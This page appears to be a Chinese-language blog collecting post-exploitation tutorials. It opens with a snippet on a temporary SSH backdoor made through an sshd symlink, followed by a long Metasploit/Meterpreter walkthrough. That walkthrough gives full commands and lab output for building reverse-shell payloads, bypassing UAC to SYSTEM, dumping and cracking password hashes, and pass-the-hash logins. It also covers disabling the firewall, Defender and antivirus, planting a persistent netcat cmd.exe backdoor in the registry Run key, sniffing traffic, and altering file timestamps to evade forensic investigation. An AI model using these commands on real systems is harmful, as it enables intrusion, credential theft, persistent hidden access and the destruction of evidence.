精华内容
下载资源
问答
  • linux 后渗透测试

    2017-07-26 18:47:00
    linux 后渗透测试

    学习参考:
    http://weibo.com/1869235073/B9Seswf9R?type=comment
    http://weibo.com/p/1001603723521007220513
    http://www.sohu.com/a/126011736_505860

    linux 常用shell反弹方法小结:
    https://edu.aqniu.com/group/3/thread/22

    1. SSH渗透技巧

    1.1 ssh 临时后门

    入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口肉鸡上执行

    myles@localhost:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337

    就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。效果图:

    ssh_backdoor

    1.2 如何杀死ssh临时后门

    临时后门生成后,如果我们需要杀死这个进程,请使用以下语句。

    myles@localhost# ps -ef |grep 31337  #查询后门进程ID
    myles@localhost# kill -9 ssh_pid      #使用kill -9 直接杀死进程

    kill_ssh_backdoor

    展开全文
  • Meterpreter后渗透测试

    2020-05-05 15:33:31
    Meterpreter后渗透测试 特征 Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个 ...

    Meterpreter后渗透测试

    特征

    Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个 meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和 IP 地址等信息。另外 Meterpreter 能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此 HIDS(基于主机的入侵检测系统)很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。最后,Meterpreter 还可以简化任务创建多个会话,可以来利用这些会话进行渗透。

    Meterpreter工作优点

    1、不创建进程(使用的内存注入方式)
    2、Meterpreter 是一个解释器加载各种攻击命令
    3、工作在被攻击进程的上下文中
    4、通信是加密的(TLV协议),可以躲避 IDS
    5、没有硬盘写入操作
    6、使用的通信方式是信道模式,可以同时和几个信道工作,支持多信道
    7、支持扩展编写

    Meterpreter工作过程

    1、漏洞的利用代码+第一阶段的攻击载荷
    2、攻击载荷反向连接到 msf
    3、发送第二阶段的攻击载荷
    4、客户端和服务器进行通信

    常用的系统命令

    background,把当前的会话设置为背景,需要的时候在启用
    getuid,查看对方正在运行的用户
    ps,列出所有的进程
    getpid,返回运行 meterpreter 的 id 号
    sysinfo,产看系统信息和体系结构
    shell,切换到 cmd 的系统权限方式
    exit,退出 shell 会话返回 meterpreter 或终止 meterpreter

    进程迁移和提权

    getsystem:会自动利用各种各样的系统漏洞来进行权限提升
    migrate:进程 id 进程迁移

    和目标建立多重通信的信道

    excute,用来启用多重通信信道
    excute-fexploit.exe-c
    channel-l,列出可用通信信道
    interact,和信道进行交互(获得cmd)
    write3,向信道写入数据,以‘.’结束

    常用的文件系统的命令

    pwd,查看当前所在的工作目录
    cd,切换到想要的工作目录
    search-f*.dof-dc:\,搜索文件
    download,支持文件下载
    download c:\a.doc /root,下载到本地的root目录
    upload /root/mm.exe c:\sys.exe,上传到远程主机
    timestomp,更改文件属性
    timestompc:/a.doc-v,查看文件的时间信息。
    timestompc:/a.doc-c"9/23/201314:22:11",修改文件的创建时间
    -m,-a,文件的修改时间和最后一次访问的时间。
    -z,修改所有时间,尽量不要用。
    -v,查看

    常用的网络命令

    ipconfig,查看ip配置
    route,显示路由表,也可以配置ip地址,和linux方法一样
    routeaddip,地址掩码网关
    portfwd,做端口转发的时候用的
    portfwd-a-L127.0.0.1-l888-h7.6.5.4-p5631
    -a,添加一个新的转发规则
    -L,目标主机的IP地址
    链接127.0.0.1的888端口,会被转发到7.6.5.4的5631端口
    enumdesktops,是列出所有可访问的桌面
    getdesktop,返回用户的桌面
    setdesktop,设置到某个会话的桌面
    keyscan_start,安装键盘窃听器
    keyscan_dump,导出活跃桌面的键盘记录
    关于windows的桌面的编号0控制台12其他会话或远程登陆。

    Meterpreter脚本

    使用runscriptname方式执行

    1、vnc脚本,获取远程机器vnc界面控制
    meterpreter>runvnc
    meterpreter>runscreen_unlock

    2、进程迁移
    当攻击成功后将连接进程从不稳定进程(如使用浏览器溢出漏洞exp进行攻击时浏览器
    可能会被目标关闭)迁移至稳定进程(explorer.exe),保持可连接。
    例子:
    meterpreter>runpost/windows/manage/migrate
    (在64位win7中migrate需要管理员权限执行后门才能成功,而migrate前后获取的
    权限是有差异的。)

    3、关闭杀毒软件
    meterpreter>runkillav(这个脚本要小心使用,可能导致目标机器蓝屏死机。)

    4、获取系统密码hash
    meterpreter>runhashdump
    (64位win7下需要管理员权限执行后门且先getsystem,然后使用
    runpost/windows/gather/hashdump来dumphash成功率更高。
    而且如果要使用shell添加系统账户的话win7下得先:
    runpost/windows/escalate/bypassuac,不然可能不会成功。)

    5、获取系统流量数据
    meterpreter>runpacktrecorder–i1

    6、直捣黄龙
    可以干很多事情:获取密码,下载注册表,获取系统信息等
    meterpreter>runscraper

    7、持久保持
    当目标机器重启之后仍然可以控制
    meterpreter>runpersistence–X–i50–p443–r192.168.1.111
    -X开机启动-i连接超时时间–p端口–rIP
    下次连接时:
    msf>usemulti/handler
    setpayloadwindows/meterpreter/reverse_tcp
    setLPOST443
    setLHOST192.168.1.111
    exploit
    (会在以下位置和注册表以随机文件名写入文件等信息,如:
    C:\Users\YourtUserName\AppData\Local\Temp\MXIxVNCy.vbs
    C:\Users\YourtUserName\AppData\Local\Temp\radF871B.tmp\svchost.exe
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DjMzwzCDaoIcgNP)

    基本命令

    Meterpreter > backgroud
    Msf exploit (ms_067_netapi) > sessions
    Msf exploit (ms_067_netapi) > sessions -i 1
    Meterpreter > quit
    Meterpreter > shell

    文件系统
    Meterpreter >cat c:\boot.ini
    Meterpreter >getwd
    Meterpreter >upload -h
    Meterpreter >upload netcat.exe c:
    Meterpreter >download C:\“program Files”\Tencent\QQ\User\13456\Msg2.0.db /etc
    用QQlogger打开
    Meterpreter >edit c:\windows\system32\drivers\etc\hosts
    Meterpreter >search -h

    网络命令
    Meterpreter >ipconfig
    Meterpreter >portfwd -h
    Meterpreter >route

    系统命令
    Meterpreter >ps
    Meterpreter >migrate
    Meterpreter >execute
    Meterpreter >sysinfo
    Meterpreter >info

    展开全文
  • Mestasploit 后渗透测试阶段 1. 获得普通账号权限 已经获得目标系统控制权后扩大战果 提权 信息收集 渗透内网 永久后门 基于已有 session 扩大战果 msfvenom -a x86 –...

    1. 获得普通账号权限

    • 已经获得目标系统控制权后扩大战果

      • 提权
      • 信息收集
      • 渗透内网
      • 永久后门
    • 基于已有 session 扩大战果

      • msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.6.128 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o payload.exe

    • 开启Apache传输payload

    root@kali:~# /etc/init.d/apache2 start 
    [ ok ] Starting apache2 (via systemctl): apache2.service.
    root@kali:~# cp payload.exe /var/www/html/
    

     

    • kali 监听4444端口

      msf > use exploit/multi/handler
      msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
      msf exploit(multi/handler) > set LHOST 192.168.6.128
      msf exploit(multi/handler) > exploit -j
      
    • windows 系统执行 payload.exe

    • kali 进入 metepreter

      msf exploit(multi/handler) > exploit 
      
      [*] Started reverse TCP handler on 192.168.6.128:4444 
      [*] Sending stage (179779 bytes) to 192.168.6.129
      [*] Meterpreter session 1 opened (192.168.6.128:4444 -> 192.168.6.129:49161) at 2018-09-01 18:10:29 +0800
      
      meterpreter > getuid 
      Server username: vv-PC\vv
      
      

    2. 获取 system 账号权限

    • 提权失败,一般是由于 UAC 限制

      meterpreter > getuid
      Server username: WIN7-VM\John
      meterpreter > load priv
      [-] The 'priv' extension has already been loaded.
      meterpreter > getsystem 
      [-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
      [-] Named Pipe Impersonation (In Memory/Admin)
      [-] Named Pipe Impersonation (Dropper/Admin)
      [-] Token Duplication (In Memory/Admin)
      
      
      meterpreter > background
      
    • 绕过 UAC 限制

      • use exploit/windows/local/ask

        msf exploit(multi/handler) > use exploit/windows/local/ask
        msf exploit(windows/local/ask) > set payload windows/meterpreter/reverse_tcp
        payload => windows/meterpreter/reverse_tcp
        msf exploit(windows/local/ask) > set lhost 192.168.6.128
        lhost => 192.168.6.128
        msf exploit(windows/local/ask) > set filename win_updata.exe
        filename => win_updata.exe
        msf exploit(windows/local/ask) > set session 1
        session => 1
        msf exploit(windows/local/ask) > options 
        
        Module options (exploit/windows/local/ask):
        
           Name       Current Setting  Required  Description
           ----       ---------------  --------  -----------
           FILENAME   win_updata.exe   no        File name on disk
           PATH                        no        Location on disk, %TEMP% used if not set
           SESSION    1                yes       The session to run this module on.
           TECHNIQUE  EXE              yes       Technique to use (Accepted: PSH, EXE)
        
        
        Payload options (windows/meterpreter/reverse_tcp):
        
           Name      Current Setting  Required  Description
           ----      ---------------  --------  -----------
           EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
           LHOST     192.168.6.128    yes       The listen address (an interface may be specified)
           LPORT     4444             yes       The listen port
        
        
        Exploit target:
        
           Id  Name
           --  ----
           0   Windows
        

        通过getsystem获取管理员权限

        msf exploit(windows/local/ask) > exploit 
        
        [*] Started reverse TCP handler on 192.168.6.128:4444 
        [*] UAC is Enabled, checking level...
        [*] The user will be prompted, wait for them to click 'Ok'
        [*] Uploading win_updata.exe - 73802 bytes to the filesystem...
        [*] Executing Command!
        [*] Sending stage (179779 bytes) to 192.168.6.129
        [*] Meterpreter session 2 opened (192.168.6.128:4444 -> 192.168.6.129:49162) at 2018-09-01 18:15:00 +0800
        
        meterpreter > getuid 
        Server username: vv-PC\vv
        meterpreter > getsystem 
        ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
        meterpreter > getuid 
        Server username: NT AUTHORITY\SYSTEM
        

         

      • use exploit/windows/local/bypassuac

        msf exploit(windows/local/ask) > use exploit/windows/local/bypassuac
        msf exploit(windows/local/bypassuac) > set payload windows/meterpreter/reverse_tcp
        payload => windows/meterpreter/reverse_tcp
        msf exploit(windows/local/bypassuac) > set session 1
        session => 1
        msf exploit(windows/local/bypassuac) > set lhost  192.168.6.128
        lhost => 192.168.6.128
        msf exploit(windows/local/bypassuac) > show options 
        
        Module options (exploit/windows/local/bypassuac):
        
           Name       Current Setting  Required  Description
           ----       ---------------  --------  -----------
           SESSION    1                yes       The session to run this module on.
           TECHNIQUE  EXE              yes       Technique to use if UAC is turned off (Accepted: PSH, EXE)
        
        
        Payload options (windows/meterpreter/reverse_tcp):
        
           Name      Current Setting  Required  Description
           ----      ---------------  --------  -----------
           EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
           LHOST     192.168.6.128    yes       The listen address (an interface may be specified)
           LPORT     4444             yes       The listen port
        
        
        Exploit target:
        
           Id  Name
           --  ----
           0   Windows x86
        
        msf exploit(windows/local/bypassuac) > exploit 
        
        [*] Started reverse TCP handler on 192.168.6.128:4444 
        [*] UAC is Enabled, checking level...
        [+] UAC is set to Default
        [+] BypassUAC can bypass this setting, continuing...
        [+] Part of Administrators group! Continuing...
        [*] Uploaded the agent to the filesystem....
        [*] Uploading the bypass UAC executable to the filesystem...
        [*] Meterpreter stager executable 73802 bytes long being uploaded..
        [*] Sending stage (179779 bytes) to 192.168.6.129
        [*] Meterpreter session 3 opened (192.168.6.128:4444 -> 192.168.6.129:49165) at 2018-09-01 18:21:37 +0800
        
        meterpreter > getuid 
        Server username: vv-PC\vv
        meterpreter > getsystem 
        ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
        meterpreter > getuid 
        Server username: NT AUTHORITY\SYSTEM
        

         

      • use exploit/windows/local/bypassuac_injection

        msf exploit(windows/local/bypassuac_injection) > use exploit/windows/local/bypassuac_injection
        msf exploit(windows/local/bypassuac_injection) > set payload windows/meterpreter/reverse_tcp
        payload => windows/meterpreter/reverse_tcp
        msf exploit(windows/local/bypassuac_injection) > set session 1
        session => 1
        msf exploit(windows/local/bypassuac_injection) > set lhost 192.168.6.128
        lhost => 192.168.6.128
        msf exploit(windows/local/bypassuac_injection) > options 
        
        Module options (exploit/windows/local/bypassuac_injection):
        
           Name     Current Setting  Required  Description
           ----     ---------------  --------  -----------
           SESSION  1                yes       The session to run this module on.
        
        
        Payload options (windows/meterpreter/reverse_tcp):
        
           Name      Current Setting  Required  Description
           ----      ---------------  --------  -----------
           EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
           LHOST     192.168.6.128    yes       The listen address (an interface may be specified)
           LPORT     4444             yes       The listen port
        
        
        Exploit target:
        
           Id  Name
           --  ----
           0   Windows x86
        
        msf exploit(windows/local/bypassuac_injection) > exploit 
        
        [*] Started reverse TCP handler on 192.168.6.130:4444 
        [+] Windows 7 (Build 7601, Service Pack 1). may be vulnerable.
        [*] UAC is Enabled, checking level...
        [+] Part of Administrators group! Continuing...
        [+] UAC is set to Default
        [+] BypassUAC can bypass this setting, continuing...
        [*] Uploading the Payload DLL to the filesystem...
        [*] Spawning process with Windows Publisher Certificate, to inject into...
        [+] Successfully injected payload in to process: 3236
        [*] Sending stage (179779 bytes) to 192.168.6.154
        [*] Meterpreter session 2 opened (192.168.6.130:4444 -> 192.168.6.154:49175) at 2018-09-01 20:57:42 +0800
        
        meterpreter > getuid 
        Server username: vv-PC\vv
        meterpreter > getsystem 
        ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
        meterpreter > getuid 
        Server username: NT AUTHORITY\SYSTEM
        
        

         

    • 利用漏洞直接提权为 system

      • use exploit/windows/local/ms13_053_schlamperei(未成功)

        use exploit/windows/local/ms13_053_schlamperei
        set SESSION 1
        

      • use exploit/windows/local/ms13_081_track_popup_menu(使目标重启,DOS攻击)

        use exploit/windows/local/ms13_081_track_popup_menu
        set SESSION 1
        exploit
        

      • use exploit/windows/local/ms13_097_ie_registry_symlink

        use exploit/windows/local/ms13_097_ie_registry_symlink
        set SESSION 1
        set URIPATH /
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        set SRVHOST 10.0.0.128
        exploit
        
      • use exploit/windows/local/ppr_flatten_rec

        use exploit/windows/local/ppr_flatten_rec
        set SESSION 1
        exploit
        

    • 图形化 payload

      • set payload windows/vncinject/reverse_tcp

        use exploit/windows/local/ppr_flatten_rec
        set payload windows/vncinject/reverse_tcp
        set SESSION 1
        set LHOST 10.0.0.128
        set ViewOnly false
        exploit
        

     

    • 关闭 UAC 功能

      • 获取 hashdump

        meterpreter > hashdump
            Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
            Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
            John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
        
      • 尝试利用

        use exploit/windows/smb/psexec
        set RHOST 10.0.0.132
        set SMBUser John
        set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        exploit
        

        报错:Exploit failed [no-access]

      • 需要提前关闭 UAC

        sessions -i 2
        shell
        cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
        shutdown -r -t 0
        

      • 再次利用

        use exploit/windows/smb/psexec
        set RHOST 10.0.0.132
        set SMBUser John
        set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        exploit
        

    4. 基础操作

    1. 关闭防火墙

    • 需要管理员或system权限

      netsh advfirewall set allprofiles state on
      netsh advfirewall set allprofiles state off
      

    2. 关闭 windefend

    • 查看服务名称

    • 关闭防火墙

      net stop windefend
      

    3. bitlocker 加密

    • manage-bde -off C:
    • manage-bde -status C:

    4. 关闭 DEP

    • bcdedit.exe /set {current} nx AlwaysOff

    5 杀死防病毒软件

    • run killav
    • run post/windows/manage/killav

    6. 开启远程桌面服务

    # 开启服务
    run post/windows/manage/enable_rdp
    

    # 关闭服务
    run multi_console_command -rc root/.msf4/loot/20180418001805_default_10.0.0.132_host.windows.cle_842354.txt
    
    # 开启服务
    run getgui –e
    run getgui -u yuanfh -p pass
    run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20160824.1855.rc
    

    7. 查看远程桌面

    • screenshot
    • use espia
      • screengrab

    5. 使用 tokens 攻击域控制器

    -tokens
    - 用户每次登录,账号绑定临时的tokens
    - 访问资源时提交 tokens 进行身份验证,类似于 web cookies
    - delegate tokens:交互登录会话
    - impersonate tokens:非交互登录会话
    - delegate tokens 账号注销后变为 Impersonate Token,权限依然有效

    • Incognito

      • 独立功能的软件,被 msf 集成在 metepreter 中
      • 无需密码或破解或获取密码 hash,窃取 tokens 将自己伪装成其他用户
      • 尤其适用于域环境下提权渗透多操作系统
    • 搭建域环境

      • DC + XP
    • load incognito

      • list_tokens -u
      • impersonate_token lab\administrator
      • 运行以上命令需要 getsystem
        • 本地普通权限用户需要先本地权限
        • use exploit/windows/local/ms10_015_kitrap0d
        • execute -f cmd.exe -i -t # -t:使用当前假冒tokens执行程序
        • shell

    8. 注册表

    • 注册表保存着 windows 几乎全部配置参数

      • 如果修改不当,可直接造成系统崩溃
      • 修改前完整备份注册表
      • 某些注册表的修改是不可逆的
    • 常见用途

      • 修改、增加启动项
      • 窃取存储于注册表中的机密信息
      • 绕过文件型病毒查杀
    • 用注册表添加 nc 后门服务(metepreter)

    meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
    [*] uploading  : /usr/share/windows-binaries/nc.exe -> C:\windows\system32
    [*] uploaded   : /usr/share/windows-binaries/nc.exe -> C:\windows\system32\nc.exe
    meterpreter > reg 
    Usage: reg [command] [options]
    
    Interact with the target machine's registry.
    
    OPTIONS:
    
        -d <opt>  The data to store in the registry value.
        -h        Help menu.
        -k <opt>  The registry key path (E.g. HKLM\Software\Foo).
        -r <opt>  The remote machine name to connect to (with current process credentials
        -t <opt>  The registry value type (E.g. REG_SZ).
        -v <opt>  The registry value name (E.g. Stuff).
        -w        Set KEY_WOW64 flag, valid values [32|64].
    COMMANDS:
    
        enumkey	Enumerate the supplied registry key [-k <key>]
        createkey	Create the supplied registry key  [-k <key>]
        deletekey	Delete the supplied registry key  [-k <key>]
        queryclass Queries the class of the supplied key [-k <key>]
        setval	Set a registry value [-k <key> -v <val> -d <data>]
        deleteval	Delete the supplied registry value [-k <key> -v <val>]
        queryval	Queries the data contents of a value [-k <key> -v <val>]
    
    
    meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
    Enumerating: HKLM\software\microsoft\windows\currentversion\run
    
      Values (1):
    
    	VMware                    #查看开机启动的进程
    
    meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'    #创建副键
    Successfully set nc of REG_SZ.
    meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
    Key: HKLM\software\microsoft\windows\currentversion\Run
    Name: nc
    Type: REG_SZ
    Data: C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe

     

    • 打开防火墙端口(metepreter)

    
    meterpreter > execute -f cmd -i -H
    Process 2276 created.
    Channel 5 created.
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
    
    C:\Users\vv\Desktop>netsh firewall show opmode      查看防火墙状态
    netsh firewall show opmode
    
    Domain profile configuration:
    -------------------------------------------------------------------
    Operational mode                  = Disable
    Exception mode                    = Enable
    
    Standard profile configuration (current):
    -------------------------------------------------------------------
    Operational mode                  = Enable
    Exception mode                    = Enable
    
    IMPORTANT: Command executed successfully.
    However, "netsh firewall" is deprecated;
    use "netsh advfirewall firewall" instead.
    For more information on using "netsh advfirewall firewall" commands
    instead of "netsh firewall", see KB article 947709
    at http://go.microsoft.com/fwlink/?linkid=121488 .
    
    
    
    C:\Users\vv\Desktop>netsh firewall add portopening TCP 444 "test" ENABLE ALL
    netsh firewall add portopening TCP 444 "test" ENABLE ALL     #添加防火墙规则
    
    IMPORTANT: Command executed successfully.
    However, "netsh firewall" is deprecated;
    use "netsh advfirewall firewall" instead.
    For more information on using "netsh advfirewall firewall" commands
    instead of "netsh firewall", see KB article 947709
    at http://go.microsoft.com/fwlink/?linkid=121488 .
    
    Ok.
    
    
    C:\Users\vv\Desktop>shutdown -r -f -t 0                  #重启目标主机生效
    
    
    
    
    
    

    9. 抓包

    • 抓包(metepreter)
      • load sniffer
      • sniffer_interfaces
      • sniffer_start 2
      • sniffer_dump 2 1.cap / sniffer_dump 2 1.cap
      • 在内存中缓冲区块循环存储抓包(50000包),不写硬盘
      • 智能过滤 metepreter 流量,传输全称使用 SSL/TLS 加密
    meterpreter > load sniffer 
    Loading extension sniffer...Success.
    meterpreter > help 
    Sniffer Commands
    ================
    
        Command             Description
        -------             -----------
        sniffer_dump        Retrieve captured packet data to PCAP file
        sniffer_interfaces  Enumerate all sniffable network interfaces
        sniffer_release     Free captured packets on a specific interface instead of downloading them
        sniffer_start       Start packet capture on a specific interface
        sniffer_stats       View statistics of an active capture
        sniffer_stop        Stop packet capture on a specific interface
    
    meterpreter > sniffer_interfaces 
    
    1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
    2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
      
    meterpreter > sniffer_start 2
    [*] Capture started on interface 2 (50000 packet buffer)
    meterpreter > sniffer_dump 2 1.cap
    [*] Flushing packet capture buffer for interface 2...
    [*] Flushed 164 packets (20244 bytes)
    [*] Downloaded 100% (20244/20244)...
    [*] Download completed, converting to PCAP...
    [*] PCAP file written to 1.cap
    meterpreter > sniffer_dump 2 2.cap
    [*] Flushing packet capture buffer for interface 2...
    [*] Flushed 686 packets (182326 bytes)
    [*] Downloaded 100% (182326/182326)...
    [*] Download completed, converting to PCAP...
    [*] PCAP file written to 2.cap
    

     

    • 解码
      • use auxiliary/sniffer/psnuffle
      • set PCAPFILE /root/1.cap
    meterpreter > background 
    [*] Backgrounding session 1...
    msf exploit(multi/handler) > use auxiliary/sniffer/psnuffle 
    msf auxiliary(sniffer/psnuffle) > options 
    
    Module options (auxiliary/sniffer/psnuffle):
    
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       FILTER                      no        The filter string for capturing traffic
       INTERFACE                   no        The name of the interface
       PCAPFILE                    no        The name of the PCAP capture file to process
       PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".
       SNAPLEN    65535            yes       The number of bytes to capture
       TIMEOUT    500              yes       The number of seconds to wait for new data
    
    
    Auxiliary action:
    
       Name     Description
       ----     -----------
       Sniffer  
    
    msf auxiliary(sniffer/psnuffle) > set pcapfile 2.cap
    pcapfile => 2.cap
    msf auxiliary(sniffer/psnuffle) > exploit 
    [*] Auxiliary module running as background job 0.
    msf auxiliary(sniffer/psnuffle) > 
    [*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
    [*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
    [*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
    [*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
    [*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
    [*] Sniffing traffic.....
    [*] HTTP GET: 192.168.6.134:49161-192.168.6.1:80 http://192.168.6.1/
    [*] HTTP GET: 192.168.6.134:49161-192.168.6.1:80 http://192.168.6.1/favicon.ico
    [*] HTTP GET: 192.168.6.134:49161-192.168.6.1:80 http://192.168.6.1/dvwa/
    [*] HTTP GET: 192.168.6.134:49161-192.168.6.1:80 http://192.168.6.1/dvwa/login.php
    [*] HTTP GET: 192.168.6.134:49161-192.168.6.1:80 http://192.168.6.1/dvwa/dvwa/css/login.css
    [*] HTTP GET: 192.168.6.134:49162-192.168.6.1:80 http://192.168.6.1/dvwa/dvwa/images/login_logo.png
    [*] HTTP GET: 192.168.6.134:49161-192.168.6.1:80 http://192.168.6.1/favicon.ico
    [*] HTTP GET: 192.168.6.134:49163-192.168.6.1:80 http://192.168.6.1/sqllib/
    [*] HTTP GET: 192.168.6.134:49163-192.168.6.1:80 http://192.168.6.1/sqllib/index.html_files/freemind2html.css
    [*] HTTP GET: 192.168.6.134:49164-192.168.6.1:80 http://192.168.6.1/sqllib/index.html_files/freemind2html.js
    [*] HTTP GET: 192.168.6.134:49163-192.168.6.1:80 http://192.168.6.1/sqllib/index.html_files/image.png
    [*] HTTP GET: 192.168.6.134:49164-192.168.6.1:80 http://192.168.6.1/sqllib/sql-connections/setup-db.php
    [*] Finished sniffing
    Interrupt: use the 'exit' command to quit
    

     

    10. 搜索文件

    • search -f *.ini
    • search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx

    11. 破解弱口令

    • John the Ripper 破解弱口令

    – use post/windows/gather/hashdump # system 权限的 metepreter
    - run # 结果保存在 /tmp 目录下
    - use auxiliary/analyze/jtr_crack_fast
    - run

    meterpreter > getsystem 
    ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
    meterpreter > getuid 
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > background 
    [*] Backgrounding session 1...
    msf auxiliary(sniffer/psnuffle) > use post/windows/gather/hashdump 
    msf post(windows/gather/hashdump) > set session 1
    session => 1
    msf post(windows/gather/hashdump) > exploit 
    
    [*] Obtaining the boot key...
    [*] Calculating the hboot key using SYSKEY d547a11a1d5b60bbae251d356e192de0...
    [*] Obtaining the user list and keys...
    [*] Decrypting user keys...
    [*] Dumping password hints...
    
    vv:"vv"
    
    [*] Dumping password hashes...
    
    
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    vv:1000:aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063716ab7fe2a11faf126d8:::
    
    
    [*] Post module execution completed
    msf post(windows/gather/hashdump) > use auxiliary/analyze/jtr_crack_fast 
    
    msf auxiliary(analyze/jtr_crack_fast) > exploit 
    
    [*] Cracking nt hashes in incremental mode (Digits)...
    [*] Loaded 2 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
    [*] Remaining 1 password hash
    Press 'q' or Ctrl-C to abort, almost any other key for status
    0g 0:00:00:04 DONE (Mon Sep  3 21:50:07 2018) 0g/s 23052Kp/s 23052Kc/s 23052KC/s 73673953..73673952
    Session completed
    [*] Cracked Passwords this run:
    [+] vv:vv:1:1
    [+] vv:vv:4:4
    [+] vv:vv:1:1
    [+] vv:vv:4:4
    [*] Auxiliary module execution completed
    

    12. 擦除痕迹

    • 文件系统访问会留下痕迹。电子取证重点关注
    • 渗透测试和攻击者往往希望销毁文件系统访问痕迹
    • 最好的避免被电子取证发现的方法:不要碰文件系统

      • metepreter 的先天优势所在(完全基于内存)
    • MAC 时间 (Modified / Accessed / Changed)

      • ls -l –time=atime/mtime/ctime 1.txt
      • stat 1.txt
      • touch -d “2 days ago” 1.txt
      • touch -t 1501010101 1.txt
    • MACE:MFT entry

      • MFT:NTFS 文件系统的主文件分配表 Master File Table
      • 通常 1024 字节或2个硬盘扇区,其中存放多项 entry 信息
      • 包含文件大量信息(大小 名称 目录位置 磁盘位置 创建日期)
      • 更多信息可研究文件系统取证分析技术
    • Timestomp (meterpreter)

      • timestomp -v 1.txt
      • timestomp -f c:\autoexec.bat 1.txt
        -b -r # 擦除 MACE 时间信息,目前此参数功能失效
      • -m / -a / -c / -e / -z
    meterpreter > timestomp -v 1.txt
    [*] Showing MACE attributes for 1.txt
    Modified      : 2018-09-04 10:58:47 +0800
    Accessed      : 2018-09-04 10:58:37 +0800
    Created       : 2018-09-04 10:58:37 +0800
    Entry Modified: 2018-09-04 10:58:47 +0800
    meterpreter > timestomp -m "03/11/2019 22:22:22" 1.txt
    [*] Setting specific MACE attributes on 1.txt
    meterpreter > timestomp -v 1.txt
    [*] Showing MACE attributes for 1.txt
    Modified      : 2019-03-11 22:22:22 +0800
    Accessed      : 2018-09-04 10:58:37 +0800
    Created       : 2018-09-04 10:58:37 +0800
    Entry Modified: 2018-09-04 10:58:47 +0800
    

     

    timestomp -z “MM/DD/YYYY HH24:MI:SS” 2.txt

    meterpreter > timestomp -v 1.txt
    [*] Showing MACE attributes for 1.txt
    Modified      : 2018-09-04 10:58:47 +0800
    Accessed      : 2018-09-04 10:58:37 +0800
    Created       : 2018-09-04 10:58:37 +0800
    Entry Modified: 2018-09-04 10:58:47 +0800
    
